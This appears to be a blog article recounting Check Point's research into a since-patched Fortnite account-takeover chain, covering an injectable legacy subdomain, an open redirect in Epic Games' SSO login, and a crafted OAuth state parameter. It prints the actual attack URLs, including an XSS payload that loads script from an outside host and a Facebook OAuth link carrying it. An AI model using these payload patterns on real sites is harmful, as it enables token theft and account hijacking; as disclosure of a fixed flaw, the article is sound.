Fortnite hack shows Epic Games was sloppy with Security

When you’re the most popular game in 2018, with almost 80 million users, with millions rolling in the door, you’d expect to spend a lot of time on security.

Researchers at Check Point Software Technologies, discovered a vulnerability with the way tokens are issued when logging into Fortnite. It’s important to know 2 things about this up front:

• This would theoretically allow a hacker to take ownership of your account, but it is currently understood that this has not impacted any Fortnite users.
• Fortnite developers Epic Games have already fixed the vulnerabilities.

The vulnerabilities could have allow hackers to:

• Gain full access to a user’s account and personal information
• Enable them to purchase virtual in-game currency using the victim’s payment card details
• Listen to in-game chatter as well as surrounding sounds and conversations within the victim’s home or other location of play – a massive invasion of privacy

Details of the Hack

It seems Epic Games was a playing a little fast and loose with old sub-domains, such as ‘http://ut2004stats.epicgames.com’. This domain was not hardened against a SQL Injection attack and when malicious code was tested, things started to unwind.

A GET request with the following path: “/serverstats.php?server=[some server code]” resulted in a response of ‘Server database error’. This gave the researchers a hint about where to proceed and proceed they did.

It was also discovered that the sub-domain ‘http://ut2004stats.epicgames.com’ contained a web page called “maps” which was vulnerable to a Cross-Site Scripting (XSS) attack.

They continued. After the knowledge they’d gained so far, they understood there was an issue with the login and proceeded to bang on the oAuth SSO mechanism.

To make it easy for users, Epic Games did what many sites do, use a generic SSO implementation to handle authenticating users from social media accounts like Facebook, Google, Xbox Live and PlayStation Network. Turns out there was a bug in this implementation and that enabled an oAuth Account take over.

The code read like this:

https://accounts.epicgames.com/login?productName=epic-games&lang=en_US&redirectUrl=https%3A%2F%2Fwww.epicgames.com%2Fsite%2Fen-US%2Fhome&client_id=[cliend_id]&noHostRedirect=true

The poor implementation of the authentication to Epic’s servers, enabled the researchers (and potentially bad actors) to manipulate the redirect URL and direct the user to any web page within the “*.epicgames.com” domain.

With the ability to control the “redirctedUrl” parameter, they redirected the victim (their own test accounts) to ‘ut2004stats.epicgames.com’, site that contained the XSS payload, smart and also scary.

http://ut2004stats.epicgames.com/index.php?stats=maps&SearchName=”><script%20src=%27%2f%2fbit.ly%2f2QlSHBO%27><%2fscript>

The JavaScript payload could then make a request to any SSO provider. A request to the SSO providers contains a “state” parameter which is used later on by the “accounts.epicgames.com” in order to complete the authentication process. The JavaScript payload contains a crafted “state” parameter. The “state” parameter value contained a Base64 encoded JSON and the JSON contained three keys, “redirectUrl”, “client_id” and “prodectName”. The “redirectedUrl” parameter is used for redirection as the SSO login completes.

The researchers understood that same process could also be recreated with each of these SSO providers mentioned above, using the same technique.

As a proof of concept, they chose to use Facebook.

The code below shows they were able to craft the “state” parameter with a redirection to “ut2004stats.epicgames.com” with the XSS payload.

https://www.facebook.com/dialog/oauth?client_id=1132078350149238&redirect_uri=https://accounts.epicgames.com/OAuthAuthorized&state=eyJpc1BvcHVwIjoidHJ1ZSIsImlzQ3JlYXRlRmxvdyI6InRydWUiLCJpc1dlYiI6InRydWUiLCJvYXV0aFJlZGlyZWN0VXJsIjoiaHR0cDovL3V0MjAwNHN0YXRzLmVwaWNnYW1lcy5jb20vaW5kZXgucGhwP3N0YXRzPW1hcHMmU2VhcmNoTmFtZT0lMjIlM2UlM2NzY3JpcHQlMjBzcmM9JyUyZiUyZmJpdC5seSUyZjJRbFNIQk8nJTNlJTNjJTJmc2NyaXB0JTNlJTJmIyUyZiJ9&response_type=code&display=popup&scope=email,public_profile,user_friends

Facebook then responds by redirecting the the user to “accounts.epicgames.com” containing the manipulated state parameter.

Epic Games then takes the Facebook token and the attacker’s crafted “state” parameter and makes a request to Epic Games’ server in order to finish the authentication process.

Next, the server (Epic Games) generates a response with no input validation (one of the big issues) and redirects the user to “ut2004stats.epicgames.com” with the XSS payload and the Facebook token.

Finally, the user is redirected to the vulnerable web page where the XSS payload is executed and the authentication code is stolen. That webpage looks like this:

At this stage, the attacker now has the users’ Facebook token and can successfully login to the victims’ account.

Thankfully as I mentioned above this is already patched, but it does serve as a great reminder, that security is really important, every step in the process as going sideways is often the method of attack.

You can read more information on the Fortnite hack at https://research.checkpoint.com/hacking-fortnite/